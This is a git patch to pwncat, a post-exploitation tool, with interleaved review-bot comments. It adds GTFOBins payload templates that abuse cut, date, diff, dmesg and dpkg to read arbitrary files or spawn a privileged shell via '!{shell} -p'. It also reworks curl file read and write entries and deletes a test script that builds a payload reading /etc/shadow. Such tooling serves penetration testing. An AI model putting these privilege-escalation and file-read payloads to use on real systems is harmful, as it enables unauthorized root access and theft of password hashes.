From 0ce067ada9fac93a401e91c9e004a1c760d6632b Mon Sep 17 00:00:00 2001
From: John Hammond
Date: Thu, 14 May 2020 23:19:40 -0400
Subject: [PATCH] Added GTFObins cut, date, diff, dmesg, dpkg

---
 data/gtfobins.json | 63 ++++++++++++++++++++++++++++++++++++++---
 gtfobinstest.py | 40 --------------------------
 pwncat/commands/base.py | 2 +-
 3 files changed, 60 insertions(+), 45 deletions(-)
 delete mode 100644 gtfobinstest.py

diff --git a/data/gtfobins.json b/data/gtfobins.json
index b36eb5e..c78da58 100644
--- a/data/gtfobins.json
+++ b/data/gtfobins.json
@@ -110,7 +110,7 @@
 },
 {
 "type": "read",
- "stream": "print",
+ "stream": "raw",
 "payload": "{command} -c '{cat} {lfile}'",
 "suid": ["-p"],
 "exit": "{ctrl_d}"
@@ -465,8 +465,8 @@
 {
 "type": "read",
 "stream": "base64",
- "payload": "{command}",
- "args": ["-s", "file://{lfile} --output - | {base64} -w 0"]
+ "payload": "{command} | {base64} -w 0",
+ "args": ["-s", "file://{lfile} --output -"]
 },
 {
 "type": "write",
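Review bot: In the new curl read entry, `"args": ["-s", "file://{lfile} --output -"]` packs three shell tokens into one list element, while the curl write entry in this same commit splits the equivalent tokens into `"file://$TF", "--output", "{lfile}"`. If the args list is ever joined with per-element quoting, the read entry turns into a single bogus argument, so the two entries should use the same form, e.g. `"args": ["-s", "file://{lfile}", "--output", "-"]`. How args are joined into the command line is not visible in this hunk, so this is a consistency point rather than a confirmed failure.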
@@ -485,8 +485,63 @@
 "type": "write",
 "stream": "base64",
 "payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
- "args": ["-s", "file://$TF --output {lfile}"],
+ "args": ["-s", "file://$TF", "--output", "{lfile}"],
 "exit": "{ctrl_d}"
 }
+ ],
+//-------------------------------------------------------------------
+ "cut": [
+ {
+ "type": "read",
+ "stream": "print",
+ "payload": "{command}",
+ "args": ["-d", "''", "-f1", "{lfile}"]
+ }
+ ],
+//-------------------------------------------------------------------
+ "date": [
+ {
+ // This is a janky reader that relies on cut to fully carve out the output.
+ "type": "read",
+ "stream": "print",
+ "payload": "{command} | {cut} -d \":\" -f2- | while read line; do echo ${{line:14:-1}}; done",
+ "args": ["-f", "{lfile}", "+\"%M%M%M%M%M%M\"", "2>&1"]
+ }
+ ],
+//-------------------------------------------------------------------
+ "diff": [
+ {
+ "type": "read",
+ "stream": "print",
+ "payload": "{command}",
+ "args": ["--line-format=%L", "/dev/null", "{lfile}"]
+ }
+ ],
+//-------------------------------------------------------------------
+ "dmesg": [
+ {
+ "type": "shell",
+ "payload": "{command}",
+ "args": ["-H"],
+ "input": "!{shell} -p\n",
+ "exit": "exit\nq\n"
+ },
+ {
+ "type": "read",
+ "stream": "print",
+ "payload": "{command}",
+ "args": ["-rF", "{lfile}"]
+ }
+ ],
+//-------------------------------------------------------------------
+ "dpkg": [
+ {
+ "type": "shell",
+ "payload": "{command}",
+ "args": ["-l"],
+ "input": "!{shell} -p\n",
+ "exit": "exit\nq\n"
+ }
 ]
+ }
\ No newline at end of file
diff --git a/gtfobinstest.py b/gtfobinstest.py
deleted file mode 100644
index 24f1441..0000000
--- a/gtfobinstest.py
+++ /dev/null
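Review bot: The new `date` reader recovers file content from `date`'s error text, so any line that `date -f` can actually parse (a blank line, a bare number such as `2020`, the word `now`) is silently replaced by the `%M%M%M%M%M%M` output instead of being returned, and the fixed `${{line:14:-1}}` offset assumes the English `invalid date` wording. Prefixing the payload with `LC_ALL=C ` pins the message text; the parse-success case cannot be fixed with this primitive, so the comment should warn about it: `// Lines date can parse (blank, bare numbers, 'now') are lost; offset 14 assumes the C-locale "invalid date" message.` The `:14:-1` negative-length substring is also bash-only and breaks under dash, and the shell the payload runs in is chosen outside this hunk. The `//` comments inside the object presuppose a loader that strips them, which this hunk does not show.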
@@ -1,40 +0,0 @@
-#!/usr/bin/env python3
-
-
-from pwncat.gtfobins import *
-import subprocess
-
-
-def which(path: str, quote=False):
- try:
- output = subprocess.check_output(f"which {path}", shell=True)
- except subprocess.CalledProcessError:
- return None
-
- return output.decode("utf-8").strip()
-
-
-gtfo = GTFOBins("data/gtfobins.json", which)
-
-
-binary_to_test = "curl"
-# capabilities_to_test = Capability.SHELL
-capabilities_to_test = Capability.WRITE
-# capabilities_to_test = Capability.WRITE
-our_shell = "/bin/bash"
-binary = gtfo.find_binary(binary_to_test)
-print(binary)
-print(vars(binary))
-methods = binary.iter_methods(
- which(binary_to_test), caps=capabilities_to_test, stream=None
-)
-for method in methods:
- # print(method)
- # print(method.build(shell=our_shell, suid=True))
- print(method.build(lfile="/etc/shadow", suid=True)[0])
- # print(method.build(lfile="/tmp/test", data="hello")[0])
-
-# all_binaries = list(gtfo.iter_methods(Capability.SHELL))
-# print(all_binaries[0].build(shell="/bin/bash", suid=True))
diff --git a/pwncat/commands/base.py b/pwncat/commands/base.py
index 510fda8..c1b91b6 100644
--- a/pwncat/commands/base.py
+++ b/pwncat/commands/base.py
@@ -26,7 +26,7 @@ class StoreConstOnce(argparse.Action):
 def __call__(self, parser, namespace, values, option_string=None):
 if hasattr(self, "__" + self.dest + "_seen"):
 raise argparse.ArgumentError(self, "only one action may be specified")
- setattr(self, "__" + self.dest + "_seen", True)
+ setattr(namespace, "__" + self.dest + "_seen", True)
 setattr(namespace, self.dest, self.const)
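Review bot: The guard two lines above the changed line still reads `hasattr(self, "__" + self.dest + "_seen")` while the flag is now stored on `namespace`, so the flag is never found and `ArgumentError("only one action may be specified")` can no longer fire; the check should move with the flag, `if hasattr(namespace, "__" + self.dest + "_seen"):`. Keeping the flag on the namespace rather than the shared `Action` instance is the right direction, since it scopes the once-only check to a single parse instead of the parser's lifetime. `__call__` may continue past the last line shown, and the enclosing `StoreConstOnce` class starts outside the hunk.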